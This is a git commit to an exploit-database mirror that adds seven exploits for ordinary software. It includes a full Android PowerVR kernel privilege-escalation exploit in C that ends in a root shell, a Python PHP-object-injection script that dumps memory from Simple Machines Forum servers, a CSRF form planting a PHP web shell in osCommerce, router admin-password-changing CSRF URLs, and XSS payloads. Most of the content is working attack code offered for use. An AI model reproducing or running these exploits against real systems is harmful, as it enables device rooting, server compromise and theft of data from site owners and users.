DB: 2015-09-25
7 new exploits
This commit is contained in:
parent
bb2fcd6716
commit
44c9eb6ea9
8 changed files with 615 additions and 0 deletions
|
@ -34594,3 +34594,10 @@ id,file,description,date,author,platform,type,port
|
|||
38301,platforms/php/webapps/38301.txt,"WordPress Pinboard Theme 'tab' Parameter Cross Site Scripting Vulnerability",2013-02-09,"Henrique Montenegro",php,webapps,0
|
||||
38302,platforms/multiple/remote/38302.rb,"w3tw0rk / Pitbul IRC Bot Remote Code Execution",2015-09-23,metasploit,multiple,remote,6667
|
||||
38303,platforms/osx/local/38303.c,"Cisco AnyConnect 3.1.08009 - Privilege Escalation via DMG Install Script",2015-09-23,"Yorick Koster",osx,local,0
|
||||
38304,platforms/php/webapps/38304.py,"SMF (Simple Machine Forum) <= 2.0.10 - Remote Memory Exfiltration Exploit",2015-09-24,"Filippo Roncari",php,webapps,0
|
||||
38307,platforms/win32/dos/38307.txt,"Windows Kernel - NtGdiBitBlt Buffer Overflow (MS15-097)",2015-09-24,"Nils Sommer",win32,dos,0
|
||||
38308,platforms/hardware/remote/38308.txt,"TP-LINK TL-WR2543ND Admin Panel Multiple Cross Site Request Forgery Vulnerabilities",2013-02-08,"Juan Manuel Garcia",hardware,remote,0
|
||||
38309,platforms/php/webapps/38309.txt,"osCommerce Cross Site Request Forgery Vulnerability",2013-02-12,"Jakub Galczyk",php,webapps,0
|
||||
38310,platforms/android/remote/38310.c,"Android <= 2.3.5 PowerVR SGX Driver Information Disclosure Vulnerability",2011-11-03,"Geremy Condra",android,remote,0
|
||||
38311,platforms/php/webapps/38311.txt,"BlackNova Traders 'news.php' SQL Injection Vulnerability",2013-02-12,ITTIHACK,php,webapps,0
|
||||
38312,platforms/php/webapps/38312.txt,"AbanteCart 'index.php' Multiple Cross Site Scripting Vulnerabilities",2013-02-14,LiquidWorm,php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
318
platforms/android/remote/38310.c
Executable file
318
platforms/android/remote/38310.c
Executable file
|
@ -0,0 +1,318 @@
|
|||
source: http://www.securityfocus.com/bid/57900/info
|
||||
|
||||
The PowerVR SGX driver in Android is prone to an information-disclosure vulnerability.
|
||||
|
||||
Successful exploits allows an attacker to gain access to sensitive information. Information obtained may aid in further attacks.
|
||||
|
||||
Android 2.3.5 and prior versions are vulnerable.
|
||||
|
||||
|
||||
/*
|
||||
* levitator.c
|
||||
*
|
||||
* Android < 2.3.6 PowerVR SGX Privilege Escalation Exploit
|
||||
* Jon Larimer <jlarimer@gmail.com>
|
||||
* Jon Oberheide <jon@oberheide.org>
|
||||
*
|
||||
* Information:
|
||||
*
|
||||
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1352
|
||||
*
|
||||
* CVE-2011-1352 is a kernel memory corruption vulnerability that can lead
|
||||
* to privilege escalation. Any user with access to /dev/pvrsrvkm can use
|
||||
* this bug to obtain root privileges on an affected device.
|
||||
*
|
||||
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1350
|
||||
*
|
||||
* CVE-2011-1350 allows leaking a portion of kernel memory to user mode
|
||||
* processes. This vulnerability exists because of improper bounds checking
|
||||
* when returning data to user mode from an ioctl system call.
|
||||
*
|
||||
* Usage:
|
||||
*
|
||||
* $ CC="/path/to/arm-linux-androideabi-gcc"
|
||||
* $ NDK="/path/to/ndk/arch-arm"
|
||||
* $ CFLAGS="-I$NDK/usr/include/"
|
||||
* $ LDFLAGS="-Wl,-rpath-link=$NDK/usr/lib -L$NDK/usr/lib -nostdlib $NDK/usr/lib/crtbegin_dynamic.o -lc"
|
||||
* $ $CC -o levitator levitator.c $CFLAGS $LDFLAGS
|
||||
* $ adb push levitator /data/local/tmp/
|
||||
* $ adb shell
|
||||
* $ cd /data/local/tmp
|
||||
* $ ./levitator
|
||||
* [+] looking for symbols...
|
||||
* [+] resolved symbol commit_creds to 0xc00770dc
|
||||
* [+] resolved symbol prepare_kernel_cred to 0xc0076f64
|
||||
* [+] resolved symbol dev_attr_ro to 0xc05a5834
|
||||
* [+] opening prvsrvkm device...
|
||||
* [+] dumping kernel memory...
|
||||
* [+] searching kmem for dev_attr_ro pointers...
|
||||
* [+] poisoned 16 dev_attr_ro pointers with fake_dev_attr_ro!
|
||||
* [+] clobbering kmem with poisoned pointers...
|
||||
* [+] triggering privesc via block ro sysfs attribute...
|
||||
* [+] restoring original dev_attr_ro pointers...
|
||||
* [+] restored 16 dev_attr_ro pointers!
|
||||
* [+] privileges escalated, enjoy your shell!
|
||||
* # id
|
||||
* uid=0(root) gid=0(root)
|
||||
*
|
||||
* Notes:
|
||||
*
|
||||
* The vulnerability affects Android devices with the PowerVR SGX chipset
|
||||
* which includes popular models like the Nexus S and Galaxy S series. The
|
||||
* vulnerability was patched in the Android 2.3.6 OTA update.
|
||||
*/
|
||||
|
||||
#include <stdio.h>
|
||||
#include <stdint.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <unistd.h>
|
||||
#include <fcntl.h>
|
||||
#include <errno.h>
|
||||
#include <dirent.h>
|
||||
#include <sys/stat.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/ioctl.h>
|
||||
|
||||
#define CONNECT_SERVICES 0xc01c670c
|
||||
#define DUMP_SIZE 161920
|
||||
|
||||
typedef struct {
|
||||
uint32_t ui32BridgeID;
|
||||
uint32_t ui32Size;
|
||||
void *pvParamIn;
|
||||
uint32_t ui32InBufferSize;
|
||||
void *pvParamOut;
|
||||
uint32_t ui32OutBufferSize;
|
||||
void * hKernelServices;
|
||||
} PVRSRV_BRIDGE_PACKAGE;
|
||||
|
||||
typedef int (* _commit_creds)(unsigned long cred);
|
||||
typedef unsigned long (* _prepare_kernel_cred)(unsigned long cred);
|
||||
_commit_creds commit_creds;
|
||||
_prepare_kernel_cred prepare_kernel_cred;
|
||||
|
||||
ssize_t
|
||||
fake_disk_ro_show(void *dev, void *attr, char *buf)
|
||||
{
|
||||
commit_creds(prepare_kernel_cred(0));
|
||||
return sprintf(buf, "0wned\n");
|
||||
}
|
||||
|
||||
struct attribute {
|
||||
const char *name;
|
||||
void *owner;
|
||||
mode_t mode;
|
||||
};
|
||||
|
||||
struct device_attribute {
|
||||
struct attribute attr;
|
||||
ssize_t (*show)(void *dev, void *attr, char *buf);
|
||||
ssize_t (*store)(void *dev, void *attr, const char *buf, size_t count);
|
||||
};
|
||||
|
||||
struct device_attribute fake_dev_attr_ro = {
|
||||
.attr = {
|
||||
.name = "ro",
|
||||
.mode = S_IRWXU | S_IRWXG | S_IRWXO,
|
||||
},
|
||||
.show = fake_disk_ro_show,
|
||||
.store = NULL,
|
||||
};
|
||||
|
||||
unsigned long
|
||||
get_symbol(char *name)
|
||||
{
|
||||
FILE *f;
|
||||
unsigned long addr;
|
||||
char dummy, sname[512];
|
||||
int ret = 0;
|
||||
|
||||
f = fopen("/proc/kallsyms", "r");
|
||||
if (!f) {
|
||||
return 0;
|
||||
}
|
||||
|
||||
while (ret != EOF) {
|
||||
ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sname);
|
||||
if (ret == 0) {
|
||||
fscanf(f, "%s\n", sname);
|
||||
continue;
|
||||
}
|
||||
if (!strcmp(name, sname)) {
|
||||
printf("[+] resolved symbol %s to %p\n", name, (void *) addr);
|
||||
return addr;
|
||||
}
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
int
|
||||
do_ioctl(int fd, void *in, unsigned int in_size, void *out, unsigned int out_size)
|
||||
{
|
||||
PVRSRV_BRIDGE_PACKAGE pkg;
|
||||
|
||||
memset(&pkg, 0, sizeof(pkg));
|
||||
|
||||
pkg.ui32BridgeID = CONNECT_SERVICES;
|
||||
pkg.ui32Size = sizeof(pkg);
|
||||
pkg.ui32InBufferSize = in_size;
|
||||
pkg.pvParamIn = in;
|
||||
pkg.ui32OutBufferSize = out_size;
|
||||
pkg.pvParamOut = out;
|
||||
|
||||
return ioctl(fd, 0, &pkg);
|
||||
}
|
||||
|
||||
int
|
||||
main(int argc, char **argv)
|
||||
{
|
||||
DIR *dir;
|
||||
struct dirent *dentry;
|
||||
int fd, ret, found, trigger;
|
||||
char *dump, *dump_end, buf[8], path[256];
|
||||
unsigned long dev_attr_ro, *ptr;
|
||||
|
||||
printf("[+] looking for symbols...\n");
|
||||
|
||||
commit_creds = (_commit_creds) get_symbol("commit_creds");
|
||||
if (!commit_creds) {
|
||||
printf("[-] commit_creds symbol not found, aborting!\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
|
||||
if (!prepare_kernel_cred) {
|
||||
printf("[-] prepare_kernel_cred symbol not found, aborting!\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
dev_attr_ro = get_symbol("dev_attr_ro");
|
||||
if (!dev_attr_ro) {
|
||||
printf("[-] dev_attr_ro symbol not found, aborting!\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
printf("[+] opening prvsrvkm device...\n");
|
||||
|
||||
fd = open("/dev/pvrsrvkm", O_RDWR);
|
||||
if (fd == -1) {
|
||||
printf("[-] failed opening pvrsrvkm device, aborting!\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
printf("[+] dumping kernel memory...\n");
|
||||
|
||||
dump = malloc(DUMP_SIZE + 0x1000);
|
||||
dump_end = dump + DUMP_SIZE + 0x1000;
|
||||
memset(dump, 0, DUMP_SIZE + 0x1000);
|
||||
|
||||
ret = do_ioctl(fd, NULL, 0, dump + 0x1000, DUMP_SIZE - 0x1000);
|
||||
if (ret == -1) {
|
||||
printf("[-] failed during ioctl, aborting!\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
printf("[+] searching kmem for dev_attr_ro pointers...\n");
|
||||
|
||||
found = 0;
|
||||
for (ptr = (unsigned long *) dump; ptr < (unsigned long *) dump_end; ++ptr) {
|
||||
if (*ptr == dev_attr_ro) {
|
||||
*ptr = (unsigned long) &fake_dev_attr_ro;
|
||||
found++;
|
||||
}
|
||||
}
|
||||
|
||||
printf("[+] poisoned %d dev_attr_ro pointers with fake_dev_attr_ro!\n", found);
|
||||
|
||||
if (found == 0) {
|
||||
printf("[-] could not find any dev_attr_ro ptrs, aborting!\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
printf("[+] clobbering kmem with poisoned pointers...\n");
|
||||
|
||||
ret = do_ioctl(fd, dump, DUMP_SIZE, NULL, 0);
|
||||
if (ret == -1) {
|
||||
printf("[-] failed during ioctl, aborting!\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
printf("[+] triggering privesc via block ro sysfs attribute...\n");
|
||||
|
||||
dir = opendir("/sys/block");
|
||||
if (!dir) {
|
||||
printf("[-] failed opening /sys/block, aborting!\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
found = 0;
|
||||
while ((dentry = readdir(dir)) != NULL) {
|
||||
if (strcmp(dentry->d_name, ".") == 0 || strcmp(dentry->d_name, "..") == 0) {
|
||||
continue;
|
||||
}
|
||||
|
||||
snprintf(path, sizeof(path), "/sys/block/%s/ro", dentry->d_name);
|
||||
|
||||
trigger = open(path, O_RDONLY);
|
||||
if (trigger == -1) {
|
||||
printf("[-] failed opening ro sysfs attribute, aborting!\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
memset(buf, 0, sizeof(buf));
|
||||
ret = read(trigger, buf, sizeof(buf));
|
||||
close(trigger);
|
||||
|
||||
if (strcmp(buf, "0wned\n") == 0) {
|
||||
found = 1;
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
if (found == 0) {
|
||||
printf("[-] could not trigger privesc payload, aborting!\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
printf("[+] restoring original dev_attr_ro pointers...\n");
|
||||
|
||||
ret = do_ioctl(fd, NULL, 0, dump + 0x1000, DUMP_SIZE - 0x1000);
|
||||
if (ret == -1) {
|
||||
printf("[-] failed during ioctl, aborting!\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
found = 0;
|
||||
for (ptr = (unsigned long *) dump; ptr < (unsigned long *) dump_end; ++ptr) {
|
||||
if (*ptr == (unsigned long) &fake_dev_attr_ro) {
|
||||
*ptr = (unsigned long) dev_attr_ro;
|
||||
found++;
|
||||
}
|
||||
}
|
||||
|
||||
printf("[+] restored %d dev_attr_ro pointers!\n", found);
|
||||
|
||||
if (found == 0) {
|
||||
printf("[-] could not restore any pointers, aborting!\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
ret = do_ioctl(fd, dump, DUMP_SIZE, NULL, 0);
|
||||
if (ret == -1) {
|
||||
printf("[-] failed during ioctl, aborting!\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
if (getuid() != 0) {
|
||||
printf("[-] privileges not escalated, exploit failed!\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
printf("[+] privileges escalated, enjoy your shell!\n");
|
||||
|
||||
execl("/system/bin/sh", "sh", NULL);
|
||||
|
||||
return 0;
|
||||
}
|
11
platforms/hardware/remote/38308.txt
Executable file
11
platforms/hardware/remote/38308.txt
Executable file
|
@ -0,0 +1,11 @@
|
|||
source: http://www.securityfocus.com/bid/57877/info
|
||||
|
||||
TP-LINK TL-WR2543ND is prone to multiple cross-site request-forgery vulnerabilities because the application fails to properly validate HTTP requests.
|
||||
|
||||
Exploiting these issues may allow a remote attacker to change a device's configuration and perform other unauthorized actions.
|
||||
|
||||
TP-LINK TL-WR2543ND 3.13.6 Build 110923 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/userRpm/NasUserAdvRpm.htm?nas_admin_pwd=hacker&nas_admin_confirm_pwd=hacker&nas_admin_authority=1&nas_admin_ftp=1&Modify=1&Save=Save
|
||||
|
||||
http://www.example.com/userRpm/BasicSecurityRpm.htm?stat=983040&Save=Save
|
232
platforms/php/webapps/38304.py
Executable file
232
platforms/php/webapps/38304.py
Executable file
|
@ -0,0 +1,232 @@
|
|||
#!/usr/bin/python
|
||||
# -*- coding: iso-8859-15 -*-
|
||||
|
||||
#############################################################################
|
||||
# Title: SMF (Simple Machine Forum) <= 2.0.10 Remote Memory Exfiltration Exploit
|
||||
# Authors: Andrea Palazzo
|
||||
# <andrea [dot] palazzo [at] truel [dot] it>
|
||||
# Filippo Roncari
|
||||
# <filippo [dot] roncari [at] truel [dot] it>
|
||||
# Truel Lab ~ http://lab.truel.it
|
||||
# Requirements: SMF <= 2.0.10
|
||||
# PHP <= 5.6.11 / 5.5.27 / 5.4.43
|
||||
# Advisories: TL-2015-PHP04 http://lab.truel.it/d/advisories/TL-2015-PHP04.txt
|
||||
# TL-2015-PHP06 http://lab.truel.it/d/advisories/TL-2015-PHP06.txt
|
||||
# TL-2015-SMF01 n/y/a
|
||||
# Details: http://lab.truel.it/2015/09/php-object-injection-the-dirty-way/
|
||||
# Demo: https://www.youtube.com/watch?v=dNRXTt7XQxs
|
||||
############################################################################
|
||||
|
||||
|
||||
import sys, requests, time, os, socket, thread, base64, string, urllib
|
||||
from multiprocessing import Process
|
||||
|
||||
#Payload Config
|
||||
bytes_num = 000 #num of bytes to dump
|
||||
address = 000 #starting memory address
|
||||
|
||||
#Target Config
|
||||
cookie = {'PHPSESSID' : '000'} #SMF session cookie
|
||||
target_host = 'http://localhost/smf/index.php' #URL of target installation index.php
|
||||
csrftoken = ''
|
||||
|
||||
#Local Server Config
|
||||
host = "localhost"
|
||||
port = 31337
|
||||
|
||||
#Memory dump variables
|
||||
dumped = ''
|
||||
current_dump = ''
|
||||
in_string = False
|
||||
brute_index = 0
|
||||
brute_list = list(string.ascii_letters + string.digits)
|
||||
r_ok = 'HTTP/1.0 200 OK' + '\n'
|
||||
r_re = 'HTTP/1.0 302 OK' + '\n'
|
||||
r_body = '''Server: Truel-Server
|
||||
Content-Type: text/xml
|
||||
Connection: keep-alive
|
||||
Content-Length: 395
|
||||
|
||||
<env:Envelope xmlns:env="http://www.w3.org/2003/05/soap-envelope">
|
||||
<env:Header>
|
||||
<n:alertcontrol xmlns:n="http://example.org/alertcontrol">
|
||||
<n:priority>1</n:priority>
|
||||
<n:expires>2001-06-22T14:00:00-05:00</n:expires>
|
||||
</n:alertcontrol>
|
||||
</env:Header>
|
||||
<env:Body>
|
||||
<m:alert xmlns:m="http://example.org/alert">
|
||||
<m:msg>Truel</m:msg>
|
||||
</m:alert>
|
||||
</env:Body>
|
||||
</env:Envelope>'''
|
||||
|
||||
|
||||
def serverStart():
|
||||
print "[+] Setting up local server on port " + str(port)
|
||||
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
|
||||
if not sock:
|
||||
print "[X] Fatal Error: Unable to create socket"
|
||||
sock.bind((host, port))
|
||||
sock.listen(1)
|
||||
return sock
|
||||
|
||||
def getToken():
|
||||
global csrftoken
|
||||
print "[+] Trying to get a valid CSRF token"
|
||||
for n in range(3): #3 attempts
|
||||
r = requests.get(target_host, cookies=cookie, allow_redirects=False)
|
||||
r = r.text
|
||||
if(r.find("action=logout;")!=-1):
|
||||
break
|
||||
start = r.find("action=logout;")
|
||||
if (start !=-1):
|
||||
end = (r[start+14:]).find('">')
|
||||
csrftoken = r[start+14 : start+end+14]
|
||||
print "[+] Authentication done. Got token " + str(csrftoken)
|
||||
return True
|
||||
else:
|
||||
print "[X] Fatal Error: You are not authenticated. Check the provided PHPSESSID."
|
||||
return False
|
||||
|
||||
def prepareForExploit():
|
||||
if not(getToken()): #get CSRF token
|
||||
os._exit(1)
|
||||
target = target_host + '?action=suggest&' + csrftoken + '&search_param=test'
|
||||
r = requests.get(target, cookies=cookie, allow_redirects=False) #necessary request
|
||||
return
|
||||
|
||||
def forgePayload(current_try, address):
|
||||
location = "http://" + current_try
|
||||
payload = 'O:12:"DateInterval":1:{s:14:"special_amount";O:9:"Exception":1:{s:19:"\x00Exception\x00previous";O:10:"SoapClient":5:{s:3:"uri";s:1:"a";s:8:"location";s:' + str(len(location)) + ':"' + location + '";s:8:"_cookies";a:1:{s:5:"owned";a:3:{i:0;s:1:"a";i:2;i:' + str(address) + ';i:1;i:' + str(address) + ';}}s:11:"_proxy_host";s:' + str(len(host)) + ':"' + str(host) + '";s:11:"_proxy_port";i:' + str(port) + ';}}}'
|
||||
return payload
|
||||
|
||||
def sendPayload(payload,null):
|
||||
target = target_host + '?action=suggest&' + csrftoken + '&search_param=' + (base64.b64encode(payload)) #where injection happens
|
||||
try:
|
||||
r = requests.get(target, cookies=cookie, allow_redirects=False)
|
||||
except requests.exceptions.RequestException:
|
||||
print "[X] Fatal Error: Unable to reach the remote host (Connection Refuse)"
|
||||
os._exit(1)
|
||||
return
|
||||
|
||||
def limitReached(dumped):
|
||||
if(len(dumped) >= bytes_num):
|
||||
return True
|
||||
else:
|
||||
return False
|
||||
|
||||
def printDumped(dumped):
|
||||
d = " "
|
||||
cnt = 1
|
||||
print "[+] " + str(len(dumped)) + " bytes dumped from " + target_host
|
||||
print "[+] ======================= Dumped Data ======================="
|
||||
for i in range(bytes_num):
|
||||
d = d + str(dumped[i])
|
||||
if (cnt % 48 == 0):
|
||||
print d
|
||||
d = " "
|
||||
if (cnt == bytes_num):
|
||||
print d
|
||||
cnt = cnt + 1
|
||||
|
||||
def getSoapRequest(sock):
|
||||
connection, sender = sock.accept()
|
||||
request = connection.recv(8192)
|
||||
return (connection, request)
|
||||
|
||||
def sendSoapResponse(connection, content):
|
||||
connection.send(content)
|
||||
connection.close()
|
||||
return
|
||||
|
||||
def getDumpedFromHost(request):
|
||||
i = request.find("Host: ") + 6
|
||||
v = request[i:i+1]
|
||||
return v
|
||||
|
||||
def pushDumped(value, string):
|
||||
global dumped
|
||||
global current_dump
|
||||
global brute_index
|
||||
global address
|
||||
global in_string
|
||||
|
||||
dumped = str(value) + str(dumped)
|
||||
if(string):
|
||||
current_dump = str(value) + str(current_dump)
|
||||
else:
|
||||
current_dump = ""
|
||||
in_string = string
|
||||
address = address-1
|
||||
brute_index = 0
|
||||
print "[" + hex(address) + "] " + str(value)
|
||||
return
|
||||
|
||||
def bruteViaResponse(sock):
|
||||
global brute_index
|
||||
current_try = ""
|
||||
response_ok = r_ok + r_body
|
||||
|
||||
for n in range(19):
|
||||
connection, request = getSoapRequest(sock)
|
||||
if not request:
|
||||
connection.close()
|
||||
return False
|
||||
if request.find("owned")!=-1:
|
||||
pushDumped(getDumpedFromHost(request), True)
|
||||
sendSoapResponse(connection,response_ok)
|
||||
return True
|
||||
else:
|
||||
if((brute_index+1) == len(brute_list)):
|
||||
sendSoapResponse(connection,response_ok)
|
||||
return False
|
||||
brute_index = brute_index + 1
|
||||
if not in_string:
|
||||
current_try = brute_list[brute_index]
|
||||
else:
|
||||
current_try = brute_list[brute_index] + str(current_dump)
|
||||
response_re = r_re + 'Location: http://' + str(current_try) + '\n' + r_body
|
||||
sendSoapResponse(connection,response_re)
|
||||
connection, request = getSoapRequest(sock)
|
||||
if request.find("owned")!=-1:
|
||||
pushDumped(getDumpedFromHost(request), True)
|
||||
sendSoapResponse(connection,response_ok)
|
||||
return True
|
||||
sendSoapResponse(connection,response_ok)
|
||||
return False
|
||||
|
||||
def bruteViaRequest(sock):
|
||||
global brute_index
|
||||
brute_index = 0
|
||||
current_try = ""
|
||||
|
||||
while(True):
|
||||
if(brute_index == len(brute_list)):
|
||||
pushDumped(".", False)
|
||||
if limitReached(dumped):
|
||||
printDumped(dumped)
|
||||
return
|
||||
if not in_string:
|
||||
current_try = brute_list[brute_index]
|
||||
else:
|
||||
current_try = brute_list[brute_index] + str(current_dump)
|
||||
payload = forgePayload(current_try,address)
|
||||
thread.start_new_thread(sendPayload,(payload,""))
|
||||
if not bruteViaResponse(sock):
|
||||
brute_index = brute_index + 1
|
||||
return
|
||||
|
||||
def runExploit():
|
||||
print "[+] Starting exploit"
|
||||
sock = serverStart()
|
||||
prepareForExploit()
|
||||
print "[+] Trying to dump " + str(bytes_num) + " bytes from " + str(target_host)
|
||||
bruteViaRequest(sock)
|
||||
sock.close()
|
||||
print "[+] Bye ~ Truel Lab (http://lab.truel.it)"
|
||||
sys.exit(0)
|
||||
|
||||
|
||||
runExploit()
|
17
platforms/php/webapps/38309.txt
Executable file
17
platforms/php/webapps/38309.txt
Executable file
|
@ -0,0 +1,17 @@
|
|||
source: http://www.securityfocus.com/bid/57892/info
|
||||
|
||||
osCommerce is prone to a cross-site request-forgery vulnerability because the application fails to properly validate HTTP requests.
|
||||
|
||||
Exploiting this issue may allow a remote attacker to perform certain actions in the context of an authorized user's session and gain unauthorized access to the affected application; other attacks are also possible.
|
||||
|
||||
osCommerce 2.3.3 is vulnerable; other versions may also be affected.
|
||||
|
||||
The following example data is available:
|
||||
|
||||
<html><body onload="document.runCSRF.submit();">
|
||||
<form method="post" name="runCSRF"
|
||||
action="http://www.example.com/catalog/admin/define_language.php?lngdir=english&filename=english/download.php&action=save">
|
||||
<input type="hidden" name="file_contents"
|
||||
value="<?php $cmd">
|
||||
</form>your shell should be here:
|
||||
catalog/includes/languages/english/download.php?cmd=id<br></body></html>
|
7
platforms/php/webapps/38311.txt
Executable file
7
platforms/php/webapps/38311.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/57910/info
|
||||
|
||||
BlackNova Traders is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/bnt/news.php?startdate=2013/02/11[SQLi]
|
15
platforms/php/webapps/38312.txt
Executable file
15
platforms/php/webapps/38312.txt
Executable file
|
@ -0,0 +1,15 @@
|
|||
source: http://www.securityfocus.com/bid/57948/info
|
||||
|
||||
AbanteCart is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
AbanteCart 1.1.3 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/abantecart/index.php?limit=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E&page=1%22%3E%3Cscript%3Ealert%282%29;%3C/script%3E&rt=product/special%22%3E%3Cscript%3Ealert%283%29;%3C/script%3E&sort=%22%3E%3Cscript%3Ealert%284%29;%3C/script%3E
|
||||
|
||||
http://www.example.com/abantecart/index.php?currency=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E&product_id=109%22%3E%3Cscript%3Ealert%282%29;%3C/script%3E&rt=product/product
|
||||
|
||||
http://www.example.com/abantecart/index.php?rt=product/manufacturer&manufacturer_id=15%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E
|
||||
|
||||
http://www.example.com/abantecart/index.php?rt=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E&s=your_admin%22%3E%3Cscript%3Ealert%282%29;%3C/script%3E&token=957bf7cb71078f4471807da1c42d721e%22%3E%3Cscript%3Ealert%283%29;%3C/script%3E
|
8
platforms/win32/dos/38307.txt
Executable file
8
platforms/win32/dos/38307.txt
Executable file
|
@ -0,0 +1,8 @@
|
|||
Source: https://code.google.com/p/google-security-research/issues/detail?id=474
|
||||
|
||||
---
|
||||
The attached PoC triggers a buffer overflow in the NtGdiBitBlt system call. It reproduces reliable on Win 7 32-bit with Special Pool enabled on win32k.sys
|
||||
---
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38307.zip
|
Loading…
Add table
Reference in a new issue